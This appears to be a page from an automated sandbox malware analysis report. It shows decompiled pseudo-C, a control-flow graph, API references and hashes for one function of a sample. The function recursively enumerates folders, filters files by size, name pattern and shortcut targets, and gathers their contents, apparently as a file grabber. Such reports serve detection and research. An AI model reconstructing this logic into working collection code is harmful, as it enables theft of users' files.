                                                                                                                                                                        control_flow_graph 1059 405b5b-405b73 1060 405b75-405b78 1059->1060 1061 405b7d-405bb8 1059->1061 1062 405fe6-405fea 1060->1062 1066 405bc2-405bc8 1061->1066 1067 405bba-405bc0 1061->1067 1068 405bcf-405be9 call 40188c FindFirstFileW 1066->1068 1067->1068 1071 405bf7-405bfa 1068->1071 1072 405beb-405bf2 LocalFree 1068->1072 1074 405bfd-405c04 1071->1074 1073 405fe4 1072->1073 1073->1062 1075 405c91-405cad 1074->1075 1076 405c0a-405c12 1074->1076 1084 405cbc-405cde call 40a503 1075->1084 1085 405caf-405cb7 call 40a503 1075->1085 1077 405c18-405c1c 1076->1077 1078 405fbc-405fcd FindNextFileW 1076->1078 1077->1078 1080 405c22-405c55 call 40a70e 1077->1080 1078->1074 1081 405fd3-405fde LocalFree FindClose 1078->1081 1094 405c85-405c8c LocalFree 1080->1094 1095 405c57-405c7d call 405b5b 1080->1095 1081->1073 1091 405ce0-405cf0 call 40a70e 1084->1091 1092 405cf2 1084->1092 1085->1084 1096 405cf4-405cfb 1091->1096 1092->1096 1102 405fb9 1094->1102 1103 405c82 1095->1103 1100 405d01-405d0e 1096->1100 1101 405fad 1096->1101 1100->1101 1104 405d14 1100->1104 1105 405fb0-405fb6 LocalFree 1101->1105 1102->1078 1103->1094 1106 405d16-405d18 1104->1106 1107 405d1e-405d2e call 40a70e 1104->1107 1105->1102 1106->1101 1106->1107 1110 405d30-405d40 call 40a70e 1107->1110 1111 405d42-405d47 1107->1111 1110->1111 1116 405d4f 1110->1116 1111->1101 1113 405d4d 1111->1113 1115 405d52-405d95 call 40a503 * 3 1113->1115 1125 405da3 1115->1125 1126 405d97-405d9a call 408fa5 1115->1126 1116->1115 1128 405da5-405dc9 1125->1128 1129 405d9f-405da1 1126->1129 1132 405df2-405e16 call 40a2aa 1128->1132 1133 405dcb-405dd7 1128->1133 1129->1128 1140 405f92-405fa7 LocalFree * 3 1132->1140 1141 405e1c-405e2c call 40a503 1132->1141 1133->1132 1136 405dd9-405dec StrCpyW 1133->1136 1136->1132 1140->1101 1144 405e8d 1141->1144 1145 405e2e-405e3a call 40a70e 1141->1145 1147 405e90-405eae call 40a69e 1144->1147 1149 405e63-405e88 LocalFree * 4 1145->1149 1150 405e3c-405e48 call 40a70e 1145->1150 1156 405f84-405f8c DeleteFileW LocalFree 1147->1156 1157 405eb4-405ec1 1147->1157 1149->1105 1150->1149 1158 405e4a-405e61 LocalFree 1150->1158 1156->1140 1157->1156 1161 405ec7-405f12 1157->1161 1158->1147 1165 405f14-405f30 1161->1165 1166 405f76-405f7e LocalFree CloseHandle 1161->1166 1168 405f32-405f36 1165->1168 1169 405f73 1165->1169 1166->1156 1170 405f38-405f48 1168->1170 1171 405f4a-405f71 1168->1171 1169->1166 1170->1169 1170->1171 1171->1140
                                                                                                                                                                        C-Code - Quality: 44%
                                                                                                                                                                        			E00405B5B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, WCHAR* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36, intOrPtr _a40, char _a44) {
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				WCHAR* _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                        				void* _v48;
                                                                                                                                                                        				void* _v52;
                                                                                                                                                                        				signed int _v56;
                                                                                                                                                                        				void* _v60;
                                                                                                                                                                        				void* _v64;
                                                                                                                                                                        				void* _v68;
                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v664;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				signed int _t114;
                                                                                                                                                                        				void* _t117;
                                                                                                                                                                        				void* _t119;
                                                                                                                                                                        				void* _t120;
                                                                                                                                                                        				void* _t121;
                                                                                                                                                                        				WCHAR* _t122;
                                                                                                                                                                        				int _t125;
                                                                                                                                                                        				void* _t127;
                                                                                                                                                                        				WCHAR* _t129;
                                                                                                                                                                        				intOrPtr _t135;
                                                                                                                                                                        				WCHAR* _t136;
                                                                                                                                                                        				void* _t138;
                                                                                                                                                                        				void* _t140;
                                                                                                                                                                        				signed int _t144;
                                                                                                                                                                        				signed int _t148;
                                                                                                                                                                        				WCHAR* _t151;
                                                                                                                                                                        				WCHAR* _t158;
                                                                                                                                                                        				WCHAR* _t162;
                                                                                                                                                                        				void* _t167;
                                                                                                                                                                        				unsigned int _t175;
                                                                                                                                                                        				WCHAR* _t177;
                                                                                                                                                                        				WCHAR* _t182;
                                                                                                                                                                        				void* _t186;
                                                                                                                                                                        				WCHAR* _t189;
                                                                                                                                                                        				void* _t191;
                                                                                                                                                                        				WCHAR* _t192;
                                                                                                                                                                        				void* _t194;
                                                                                                                                                                        				void* _t195;
                                                                                                                                                                        				WCHAR* _t196;
                                                                                                                                                                        				void* _t201;
                                                                                                                                                                        				void* _t202;
                                                                                                                                                                        				char* _t232;
                                                                                                                                                                        				intOrPtr _t233;
                                                                                                                                                                        				intOrPtr _t239;
                                                                                                                                                                        				WCHAR* _t245;
                                                                                                                                                                        				intOrPtr _t249;
                                                                                                                                                                        				signed int _t251;
                                                                                                                                                                        				signed int _t252;
                                                                                                                                                                        				WCHAR* _t253;
                                                                                                                                                                        				void* _t254;
                                                                                                                                                                        				void* _t255;
                                                                                                                                                                        				void* _t259;
                                                                                                                                                                        				void* _t260;
                                                                                                                                                                        				unsigned int _t261;
                                                                                                                                                                        				void* _t262;
                                                                                                                                                                        				void* _t264;
                                                                                                                                                                        				void* _t265;
                                                                                                                                                                        				void* _t267;
                                                                                                                                                                        
                                                                                                                                                                        				_t1 =  &_a44; // 0x406321
                                                                                                                                                                        				_t249 =  *_t1;
                                                                                                                                                                        				_v44 = __edx;
                                                                                                                                                                        				_v40 = __ecx;
                                                                                                                                                                        				if(_t249 <= _a40) {
                                                                                                                                                                        					_v16 = _v16 & 0x00000000;
                                                                                                                                                                        					_t112 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        					_t195 =  *((intOrPtr*)( *0x40e13c))(_t112, _a4);
                                                                                                                                                                        					_v52 = _t195;
                                                                                                                                                                        					_t114 =  *((intOrPtr*)( *0x40e08c))(_t195);
                                                                                                                                                                        					_t201 = 0x5c;
                                                                                                                                                                        					__eflags =  *((intOrPtr*)(_t195 + _t114 * 2 - 2)) - _t201;
                                                                                                                                                                        					_t202 = _t195;
                                                                                                                                                                        					if( *((intOrPtr*)(_t195 + _t114 * 2 - 2)) == _t201) {
                                                                                                                                                                        						_push( *0x40e3d0);
                                                                                                                                                                        						_v16 = 1;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_push( *0x40e1d0);
                                                                                                                                                                        					}
                                                                                                                                                                        					E0040188C(_t195, _t202, 0x104, _t259);
                                                                                                                                                                        					_t117 = FindFirstFileW(_t195,  &_v664); // executed
                                                                                                                                                                        					_v36 = _t117;
                                                                                                                                                                        					__eflags = _t117 - 0xffffffff;
                                                                                                                                                                        					if(_t117 != 0xffffffff) {
                                                                                                                                                                        						_t260 = _v36;
                                                                                                                                                                        						_t196 = _v16;
                                                                                                                                                                        						do {
                                                                                                                                                                        							__eflags = _v664.dwFileAttributes & 0x00000010;
                                                                                                                                                                        							if((_v664.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                        								_t119 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        								_t120 =  *((intOrPtr*)( *0x40e13c))(_t119, _a4);
                                                                                                                                                                        								__eflags = _t196;
                                                                                                                                                                        								if(_t196 == 0) {
                                                                                                                                                                        									_t233 =  *0x40e258; // 0x6d5af8
                                                                                                                                                                        									_t120 = E0040A503(_t120, _t233);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t232 =  &(_v664.cFileName);
                                                                                                                                                                        								_t121 = E0040A503(_t120, _t232);
                                                                                                                                                                        								_t261 = _v664.nFileSizeHigh;
                                                                                                                                                                        								_t251 = _v664.nFileSizeLow;
                                                                                                                                                                        								__eflags = _a24;
                                                                                                                                                                        								_v12 = _t121;
                                                                                                                                                                        								if(_a24 == 0) {
                                                                                                                                                                        									_t122 = 0;
                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t232 = L"*.lnk";
                                                                                                                                                                        									_t122 = E0040A70E( &(_v664.cFileName), _t232);
                                                                                                                                                                        								}
                                                                                                                                                                        								__eflags = _v12;
                                                                                                                                                                        								_v28 = _t122;
                                                                                                                                                                        								if(_v12 == 0) {
                                                                                                                                                                        									L52:
                                                                                                                                                                        									LocalFree(_v12);
                                                                                                                                                                        									goto L53;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t135 = _a28;
                                                                                                                                                                        									_t252 = (_t261 << 0x00000020 | _t251) >> 0xa;
                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                        									__eflags = _t261 >> 0xa - _t232;
                                                                                                                                                                        									if(__eflags > 0) {
                                                                                                                                                                        										goto L52;
                                                                                                                                                                        									}
                                                                                                                                                                        									if(__eflags < 0) {
                                                                                                                                                                        										L23:
                                                                                                                                                                        										_t136 = E0040A70E( &(_v664.cFileName), _a12);
                                                                                                                                                                        										__eflags = _t136;
                                                                                                                                                                        										if(_t136 == 0) {
                                                                                                                                                                        											L25:
                                                                                                                                                                        											_t253 = _v28;
                                                                                                                                                                        											__eflags = _t253;
                                                                                                                                                                        											if(_t253 == 0) {
                                                                                                                                                                        												goto L52;
                                                                                                                                                                        											}
                                                                                                                                                                        											L28:
                                                                                                                                                                        											_t138 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
                                                                                                                                                                        											_t140 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t138,  *0x40e1b8), _v40);
                                                                                                                                                                        											_t239 =  *0x40e1b8; // 0x6d5c58
                                                                                                                                                                        											_v20 = E0040A503(E0040A503(_t140, _t239), _v44);
                                                                                                                                                                        											__eflags = _t253;
                                                                                                                                                                        											if(_t253 == 0) {
                                                                                                                                                                        												_t264 = 0;
                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                        											} else {
                                                                                                                                                                        												_t191 = E00408FA5(_v12); // executed
                                                                                                                                                                        												_t264 = _t191;
                                                                                                                                                                        											}
                                                                                                                                                                        											_t144 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
                                                                                                                                                                        											_v16 = _t144;
                                                                                                                                                                        											_v32 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        											__eflags = _t253;
                                                                                                                                                                        											if(_t253 != 0) {
                                                                                                                                                                        												_t186 =  *((intOrPtr*)( *0x40e08c))(_t264);
                                                                                                                                                                        												__eflags = _t186 - 4;
                                                                                                                                                                        												if(_t186 > 4) {
                                                                                                                                                                        													_t189 =  *((intOrPtr*)( *0x40e0e0))(_t264, 0, 0x5c) + 2;
                                                                                                                                                                        													__eflags = _t189;
                                                                                                                                                                        													StrCpyW(_v32, _t189);
                                                                                                                                                                        												}
                                                                                                                                                                        											}
                                                                                                                                                                        											_t148 =  *((intOrPtr*)( *0x40e08c))(_a8);
                                                                                                                                                                        											__eflags = _t253;
                                                                                                                                                                        											_t150 =  !=  ? _v32 : 0;
                                                                                                                                                                        											_t151 = E0040A2AA(_v12 + _t148 * 2,  &_v16,  !=  ? _v32 : 0);
                                                                                                                                                                        											__eflags = _t151;
                                                                                                                                                                        											if(_t151 == 0) {
                                                                                                                                                                        												L51:
                                                                                                                                                                        												LocalFree(_v32);
                                                                                                                                                                        												LocalFree(_v16);
                                                                                                                                                                        												LocalFree(_v20);
                                                                                                                                                                        												goto L52;
                                                                                                                                                                        											} else {
                                                                                                                                                                        												_t218 = _v20;
                                                                                                                                                                        												_v20 = E0040A503(_v20, _v16);
                                                                                                                                                                        												__eflags = _t253;
                                                                                                                                                                        												if(_t253 == 0) {
                                                                                                                                                                        													_t254 = _v12;
                                                                                                                                                                        													L41:
                                                                                                                                                                        													_v24 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        													_t158 = E0040A69E(_t218,  &_v24);
                                                                                                                                                                        													_t265 = _v24;
                                                                                                                                                                        													__eflags = _t158;
                                                                                                                                                                        													if(_t158 == 0) {
                                                                                                                                                                        														L50:
                                                                                                                                                                        														DeleteFileW(_t265);
                                                                                                                                                                        														LocalFree(_t265);
                                                                                                                                                                        														goto L51;
                                                                                                                                                                        													}
                                                                                                                                                                        													_t162 =  *((intOrPtr*)( *0x40e184))(_t254, _t265, 0);
                                                                                                                                                                        													__eflags = _t162;
                                                                                                                                                                        													if(_t162 == 0) {
                                                                                                                                                                        														goto L50;
                                                                                                                                                                        													}
                                                                                                                                                                        													_t255 =  *((intOrPtr*)( *0x40e03c))(_t265, 0x80000000, 1, 0, 4, 0, 0);
                                                                                                                                                                        													 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v20, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        													_v48 = 0;
                                                                                                                                                                        													_t167 =  *((intOrPtr*)( *0x40e044))(0x40, 0x30c);
                                                                                                                                                                        													_t245 = _v48;
                                                                                                                                                                        													_v24 = 0;
                                                                                                                                                                        													__eflags = _t245;
                                                                                                                                                                        													if(_t245 == 0) {
                                                                                                                                                                        														L49:
                                                                                                                                                                        														LocalFree(_t167);
                                                                                                                                                                        														CloseHandle(_t255);
                                                                                                                                                                        														goto L50;
                                                                                                                                                                        													}
                                                                                                                                                                        													 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v20, 0xffffffff, 0, _t245, 0, 0);
                                                                                                                                                                        													__eflags = 0;
                                                                                                                                                                        													if(0 == 0) {
                                                                                                                                                                        														L48:
                                                                                                                                                                        														_t167 = _v24;
                                                                                                                                                                        														goto L49;
                                                                                                                                                                        													}
                                                                                                                                                                        													__eflags = _v28;
                                                                                                                                                                        													if(_v28 == 0) {
                                                                                                                                                                        														L47:
                                                                                                                                                                        														_t223 = _a36;
                                                                                                                                                                        														_v56 = _v56 & 0x00000000;
                                                                                                                                                                        														_v68 = _v24;
                                                                                                                                                                        														_v64 = _t255;
                                                                                                                                                                        														_v60 = _t265;
                                                                                                                                                                        														 *_t223 =  *_a36 + 1;
                                                                                                                                                                        														asm("movsd");
                                                                                                                                                                        														asm("movsd");
                                                                                                                                                                        														asm("movsd");
                                                                                                                                                                        														asm("movsd");
                                                                                                                                                                        														goto L51;
                                                                                                                                                                        													}
                                                                                                                                                                        													_t175 =  *((intOrPtr*)( *0x40e14c))(_t255, 0);
                                                                                                                                                                        													__eflags = _t175 >> 0xa - _a28;
                                                                                                                                                                        													if(_t175 >> 0xa >= _a28) {
                                                                                                                                                                        														goto L48;
                                                                                                                                                                        													}
                                                                                                                                                                        													goto L47;
                                                                                                                                                                        												}
                                                                                                                                                                        												_t177 = E0040A70E(_t264, _a12);
                                                                                                                                                                        												__eflags = _t177;
                                                                                                                                                                        												if(_t177 == 0) {
                                                                                                                                                                        													L39:
                                                                                                                                                                        													LocalFree(_v32);
                                                                                                                                                                        													LocalFree(_v12);
                                                                                                                                                                        													LocalFree(_v20);
                                                                                                                                                                        													LocalFree(_v16);
                                                                                                                                                                        													LocalFree(_t264);
                                                                                                                                                                        													L53:
                                                                                                                                                                        													_t107 =  &_a44; // 0x406321
                                                                                                                                                                        													_t249 =  *_t107;
                                                                                                                                                                        													L54:
                                                                                                                                                                        													_t260 = _v36;
                                                                                                                                                                        													goto L55;
                                                                                                                                                                        												}
                                                                                                                                                                        												_t218 = _t264;
                                                                                                                                                                        												_t182 = E0040A70E(_t264, _a16);
                                                                                                                                                                        												__eflags = _t182;
                                                                                                                                                                        												if(_t182 != 0) {
                                                                                                                                                                        													goto L39;
                                                                                                                                                                        												}
                                                                                                                                                                        												_t254 =  *((intOrPtr*)( *0x40e13c))(_v12, _t264);
                                                                                                                                                                        												_v12 = _t254;
                                                                                                                                                                        												LocalFree(_t264);
                                                                                                                                                                        												goto L41;
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        										_t192 = E0040A70E( &(_v664.cFileName), _a16);
                                                                                                                                                                        										__eflags = _t192;
                                                                                                                                                                        										if(_t192 == 0) {
                                                                                                                                                                        											_t253 = _v28;
                                                                                                                                                                        											goto L28;
                                                                                                                                                                        										}
                                                                                                                                                                        										goto L25;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _t252 - _t135;
                                                                                                                                                                        									if(_t252 >= _t135) {
                                                                                                                                                                        										goto L52;
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L23;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _v664.cFileName - 0x2e;
                                                                                                                                                                        							if(_v664.cFileName == 0x2e) {
                                                                                                                                                                        								goto L55;
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _a20;
                                                                                                                                                                        							if(_a20 == 0) {
                                                                                                                                                                        								goto L55;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t127 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        							_t262 =  *((intOrPtr*)( *0x40e000))(_t127, _a4,  &(_v664.cFileName));
                                                                                                                                                                        							_t129 = E0040A70E( &(_v664.cFileName), _a16);
                                                                                                                                                                        							__eflags = _t129;
                                                                                                                                                                        							if(_t129 == 0) {
                                                                                                                                                                        								_t26 = _t249 + 1; // 0x1
                                                                                                                                                                        								E00405B5B(_v40, _v44, _t262, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _t26); // executed
                                                                                                                                                                        								_t267 = _t267 + 0x2c;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_t262);
                                                                                                                                                                        							goto L54;
                                                                                                                                                                        							L55:
                                                                                                                                                                        							_t125 = FindNextFileW(_t260,  &_v664); // executed
                                                                                                                                                                        							__eflags = _t125;
                                                                                                                                                                        						} while (_t125 != 0);
                                                                                                                                                                        						_t110 =  &_v52; // 0x406321
                                                                                                                                                                        						LocalFree( *_t110);
                                                                                                                                                                        						FindClose(_t260);
                                                                                                                                                                        						goto L57;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						LocalFree(_t195);
                                                                                                                                                                        						L57:
                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				_t194 = 2;
                                                                                                                                                                        				return _t194;
                                                                                                                                                                        			}






































































                                                                                                                                                                        0x00405b67
                                                                                                                                                                        0x00405b67
                                                                                                                                                                        0x00405b6a
                                                                                                                                                                        0x00405b6d
                                                                                                                                                                        0x00405b73
                                                                                                                                                                        0x00405b82
                                                                                                                                                                        0x00405b8d
                                                                                                                                                                        0x00405ba1
                                                                                                                                                                        0x00405ba4
                                                                                                                                                                        0x00405ba7
                                                                                                                                                                        0x00405bab
                                                                                                                                                                        0x00405bb1
                                                                                                                                                                        0x00405bb6
                                                                                                                                                                        0x00405bb8
                                                                                                                                                                        0x00405bc2
                                                                                                                                                                        0x00405bc8
                                                                                                                                                                        0x00405bba
                                                                                                                                                                        0x00405bba
                                                                                                                                                                        0x00405bba
                                                                                                                                                                        0x00405bcf
                                                                                                                                                                        0x00405be1
                                                                                                                                                                        0x00405be3
                                                                                                                                                                        0x00405be6
                                                                                                                                                                        0x00405be9
                                                                                                                                                                        0x00405bf7
                                                                                                                                                                        0x00405bfa
                                                                                                                                                                        0x00405bfd
                                                                                                                                                                        0x00405bfd
                                                                                                                                                                        0x00405c04
                                                                                                                                                                        0x00405c9d
                                                                                                                                                                        0x00405ca9
                                                                                                                                                                        0x00405cab
                                                                                                                                                                        0x00405cad
                                                                                                                                                                        0x00405caf
                                                                                                                                                                        0x00405cb7
                                                                                                                                                                        0x00405cb7
                                                                                                                                                                        0x00405cbc
                                                                                                                                                                        0x00405cc4
                                                                                                                                                                        0x00405cc9
                                                                                                                                                                        0x00405cd1
                                                                                                                                                                        0x00405cd7
                                                                                                                                                                        0x00405cdb
                                                                                                                                                                        0x00405cde
                                                                                                                                                                        0x00405cf2
                                                                                                                                                                        0x00405cf2
                                                                                                                                                                        0x00405ce0
                                                                                                                                                                        0x00405ce0
                                                                                                                                                                        0x00405ceb
                                                                                                                                                                        0x00405ceb
                                                                                                                                                                        0x00405cf4
                                                                                                                                                                        0x00405cf8
                                                                                                                                                                        0x00405cfb
                                                                                                                                                                        0x00405fad
                                                                                                                                                                        0x00405fb0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405d01
                                                                                                                                                                        0x00405d01
                                                                                                                                                                        0x00405d04
                                                                                                                                                                        0x00405d08
                                                                                                                                                                        0x00405d0c
                                                                                                                                                                        0x00405d0e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405d14
                                                                                                                                                                        0x00405d1e
                                                                                                                                                                        0x00405d27
                                                                                                                                                                        0x00405d2c
                                                                                                                                                                        0x00405d2e
                                                                                                                                                                        0x00405d42
                                                                                                                                                                        0x00405d42
                                                                                                                                                                        0x00405d45
                                                                                                                                                                        0x00405d47
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405d52
                                                                                                                                                                        0x00405d5e
                                                                                                                                                                        0x00405d74
                                                                                                                                                                        0x00405d79
                                                                                                                                                                        0x00405d90
                                                                                                                                                                        0x00405d93
                                                                                                                                                                        0x00405d95
                                                                                                                                                                        0x00405da3
                                                                                                                                                                        0x00405da3
                                                                                                                                                                        0x00405d97
                                                                                                                                                                        0x00405d9a
                                                                                                                                                                        0x00405d9f
                                                                                                                                                                        0x00405d9f
                                                                                                                                                                        0x00405db1
                                                                                                                                                                        0x00405db8
                                                                                                                                                                        0x00405dc4
                                                                                                                                                                        0x00405dc7
                                                                                                                                                                        0x00405dc9
                                                                                                                                                                        0x00405dd2
                                                                                                                                                                        0x00405dd4
                                                                                                                                                                        0x00405dd7
                                                                                                                                                                        0x00405de5
                                                                                                                                                                        0x00405de5
                                                                                                                                                                        0x00405dec
                                                                                                                                                                        0x00405dec
                                                                                                                                                                        0x00405dd7
                                                                                                                                                                        0x00405dfa
                                                                                                                                                                        0x00405e04
                                                                                                                                                                        0x00405e09
                                                                                                                                                                        0x00405e0e
                                                                                                                                                                        0x00405e14
                                                                                                                                                                        0x00405e16
                                                                                                                                                                        0x00405f92
                                                                                                                                                                        0x00405f95
                                                                                                                                                                        0x00405f9e
                                                                                                                                                                        0x00405fa7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405e1c
                                                                                                                                                                        0x00405e1f
                                                                                                                                                                        0x00405e27
                                                                                                                                                                        0x00405e2a
                                                                                                                                                                        0x00405e2c
                                                                                                                                                                        0x00405e8d
                                                                                                                                                                        0x00405e90
                                                                                                                                                                        0x00405ea1
                                                                                                                                                                        0x00405ea4
                                                                                                                                                                        0x00405ea9
                                                                                                                                                                        0x00405eac
                                                                                                                                                                        0x00405eae
                                                                                                                                                                        0x00405f84
                                                                                                                                                                        0x00405f85
                                                                                                                                                                        0x00405f8c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405f8c
                                                                                                                                                                        0x00405ebd
                                                                                                                                                                        0x00405ebf
                                                                                                                                                                        0x00405ec1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405ee3
                                                                                                                                                                        0x00405ef6
                                                                                                                                                                        0x00405f05
                                                                                                                                                                        0x00405f08
                                                                                                                                                                        0x00405f0a
                                                                                                                                                                        0x00405f0d
                                                                                                                                                                        0x00405f10
                                                                                                                                                                        0x00405f12
                                                                                                                                                                        0x00405f76
                                                                                                                                                                        0x00405f77
                                                                                                                                                                        0x00405f7e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405f7e
                                                                                                                                                                        0x00405f2c
                                                                                                                                                                        0x00405f2e
                                                                                                                                                                        0x00405f30
                                                                                                                                                                        0x00405f73
                                                                                                                                                                        0x00405f73
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405f73
                                                                                                                                                                        0x00405f32
                                                                                                                                                                        0x00405f36
                                                                                                                                                                        0x00405f4a
                                                                                                                                                                        0x00405f4a
                                                                                                                                                                        0x00405f50
                                                                                                                                                                        0x00405f54
                                                                                                                                                                        0x00405f59
                                                                                                                                                                        0x00405f65
                                                                                                                                                                        0x00405f6b
                                                                                                                                                                        0x00405f6d
                                                                                                                                                                        0x00405f6e
                                                                                                                                                                        0x00405f6f
                                                                                                                                                                        0x00405f70
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405f70
                                                                                                                                                                        0x00405f40
                                                                                                                                                                        0x00405f45
                                                                                                                                                                        0x00405f48
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405f48
                                                                                                                                                                        0x00405e33
                                                                                                                                                                        0x00405e38
                                                                                                                                                                        0x00405e3a
                                                                                                                                                                        0x00405e63
                                                                                                                                                                        0x00405e66
                                                                                                                                                                        0x00405e6f
                                                                                                                                                                        0x00405e78
                                                                                                                                                                        0x00405e81
                                                                                                                                                                        0x00405fb0
                                                                                                                                                                        0x00405fb0
                                                                                                                                                                        0x00405fb6
                                                                                                                                                                        0x00405fb6
                                                                                                                                                                        0x00405fb9
                                                                                                                                                                        0x00405fb9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405fb9
                                                                                                                                                                        0x00405e3f
                                                                                                                                                                        0x00405e41
                                                                                                                                                                        0x00405e46
                                                                                                                                                                        0x00405e48
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405e55
                                                                                                                                                                        0x00405e58
                                                                                                                                                                        0x00405e5b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405e5b
                                                                                                                                                                        0x00405e16
                                                                                                                                                                        0x00405d39
                                                                                                                                                                        0x00405d3e
                                                                                                                                                                        0x00405d40
                                                                                                                                                                        0x00405d4f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405d4f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405d40
                                                                                                                                                                        0x00405d16
                                                                                                                                                                        0x00405d18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405d18
                                                                                                                                                                        0x00405cfb
                                                                                                                                                                        0x00405c0a
                                                                                                                                                                        0x00405c12
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405c18
                                                                                                                                                                        0x00405c1c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405c2e
                                                                                                                                                                        0x00405c4c
                                                                                                                                                                        0x00405c4e
                                                                                                                                                                        0x00405c53
                                                                                                                                                                        0x00405c55
                                                                                                                                                                        0x00405c57
                                                                                                                                                                        0x00405c7d
                                                                                                                                                                        0x00405c82
                                                                                                                                                                        0x00405c82
                                                                                                                                                                        0x00405c86
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405fbc
                                                                                                                                                                        0x00405fc9
                                                                                                                                                                        0x00405fcb
                                                                                                                                                                        0x00405fcb
                                                                                                                                                                        0x00405fd3
                                                                                                                                                                        0x00405fd7
                                                                                                                                                                        0x00405fde
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405beb
                                                                                                                                                                        0x00405bec
                                                                                                                                                                        0x00405fe4
                                                                                                                                                                        0x00405fe4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405fe4
                                                                                                                                                                        0x00405be9
                                                                                                                                                                        0x00405b77
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00405BE1
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00405BEC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirstFreeLocal
                                                                                                                                                                        • String ID: !c@$!c@$*.lnk$.$X\m
                                                                                                                                                                        • API String ID: 972134204-2521687096
                                                                                                                                                                        • Opcode ID: b2bc6981046b89f0825e8fe3b22cdd010d50f795f2c34f4df7670a783b0ff52d
                                                                                                                                                                        • Instruction ID: a0bd4d6dd4f3a97f7616e57fc29639dad099fc1712c2800218aeb084a22374ad
                                                                                                                                                                        • Opcode Fuzzy Hash: b2bc6981046b89f0825e8fe3b22cdd010d50f795f2c34f4df7670a783b0ff52d
                                                                                                                                                                        • Instruction Fuzzy Hash: 75D1AC71A00216ABEF04DFA5CD44EAF7775EF48300F104929FA15B72A0DB78A951CFA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
